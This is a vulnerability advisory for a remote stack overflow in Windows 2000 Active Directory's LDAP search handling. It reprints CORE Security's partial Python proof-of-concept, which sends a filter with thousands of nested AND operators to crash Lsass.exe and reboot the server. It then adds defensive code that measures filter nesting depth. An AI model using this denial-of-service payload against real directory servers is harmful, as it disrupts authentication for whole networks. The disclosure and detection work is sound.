Active Directory Remote Stack Overflow Vulnerability

Affected program: Win2k Active Directory
    Description: Microsoft Windows Active Directory remote stack overflow vulnerability
    Details: Windows Active Directory is a core component of the Windows 2000 architecture and the directory service system provided by Microsoft.
    The LDAP 3 search request handling in Windows Active Directory lacks proper buffer boundary checks on user-submitted requests. A remote attacker can exploit this flaw to trigger a buffer overflow and crash the Lsass.exe service.
    The directory service provided by Active Directory is based on the LDAP protocol, which it uses to store and retrieve Active Directory objects. The LDAP 3 'search request' function used by Active Directory is flawed: if an attacker constructs a request containing more than 1000 nested "AND" operators and sends it to the server, a stack overflow is triggered, the Lsass.exe service crashes, and the system reboots within 30 seconds.
    Attack method:
    CORE Security Technologies Advisories (advisories@coresecurity.com) provided the following test method:
    Below is a Python test script:
    # Python 2 script from the CORE advisory. It relies on CORE's own Ldap base class
    # (bindRequest, searchRequest, encapsulateHeader, LDAP_FILTER_* constants) and
    # asn1 encoder, which are not included on this page.
    class ActiveDirectoryDOS( Ldap ):
        def __init__(self):
            self._s = None
            self.host = '192.168.0.1'
            self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
            self.port = 389
            self.buffer = ''
            self.msg_id = 1
            Ldap.__init__(self)

        def generateFilter_BinaryOp( self, filter ):
            # Encode a simple (attribute=value) filter: two OCTET STRINGs under the operator tag
            filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
            filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
            return filterBuffer

        def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
            # Wrap the simple filter in numTimes nested AND operators
            simpleBinOp = self.generateFilter_BinaryOp( filter )
            filterBuffer = simpleBinOp
            for cnt in range( 0, numTimes ):
                filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
            return filterBuffer

        def searchSub( self, filterBuffer ):
            self.bindRequest()
            self.searchRequest( filterBuffer )

        def run(self, host = '', basedn = '', name = '' ):
            # the machine must not exist
            machine_name = 'xaxax'
            filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)
            # execute the anonymous query
            print 'executing query'
            filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
            self.searchSub( filterBuffer )
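The defensive counterpart to the filter above, as an added example that is not part of the CORE advisory: a check an LDAP proxy or IDS can run on the BER-encoded search filter to measure how deeply AND/OR/NOT operators are nested and refuse requests far deeper than any real client produces. The BER tag values follow RFC 2251; the depth limit of 32 is an assumed local policy, and the test filters are constructed in-line in the same shape as the advisory's.

```python
# Added example, not the advisory's PoC: an LDAP proxy or IDS check that measures how
# deeply AND/OR/NOT operators are nested in a BER-encoded search filter and refuses
# filters far deeper than real clients send. Tags per RFC 2251; depth limit is assumed.
FILTER_AND, FILTER_OR, FILTER_NOT, FILTER_EQUALITY = 0xA0, 0xA1, 0xA2, 0xA3
OCTET_STRING, MAX_FILTER_DEPTH = 0x04, 32

def read_tlv(buf, pos):
    """Decode one BER tag/length at pos; return (tag, value_start, value_end)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                  # long form: low 7 bits = number of length octets
        n = length & 0x7F
        if not 1 <= n <= 4:
            raise ValueError("unsupported BER length form")
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("BER length runs past end of buffer")
    return tag, pos, pos + length

def filter_depth(buf):
    """Maximum nesting depth of AND/OR/NOT. Deliberately iterative: a recursive
    checker would itself fall over on exactly the input it is meant to catch."""
    deepest, work = 0, [(0, len(buf), 0)]   # (pos, end, depth) of sibling filters
    while work:
        pos, end, depth = work.pop()
        while pos < end:
            tag, vstart, vend = read_tlv(buf, pos)
            if tag in (FILTER_AND, FILTER_OR, FILTER_NOT):
                deepest = max(deepest, depth + 1)
                work.append((vstart, vend, depth + 1))
            pos = vend
    return deepest

def filter_is_acceptable(buf, limit=MAX_FILTER_DEPTH):
    """Policy check: refuse over-deep or malformed filters before forwarding them."""
    try:
        return filter_depth(buf) <= limit
    except (ValueError, IndexError):
        return False

def ber(tag, payload):                   # constructed-input encoder: one BER TLV
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload
def equality(attr, value):               # (attr=value) leaf such as (name=xaxax)
    return ber(FILTER_EQUALITY, ber(OCTET_STRING, attr) + ber(OCTET_STRING, value))
def nest_and(leaf, times):               # AND(AND(...AND(leaf, leaf)..., leaf), leaf)
    f = leaf
    for _ in range(times):
        f = ber(FILTER_AND, f + leaf)
    return f
```

A filter nested 1200 deep is rejected while an ordinary three-level filter passes, and truncated or oversized BER lengths are rejected rather than parsed.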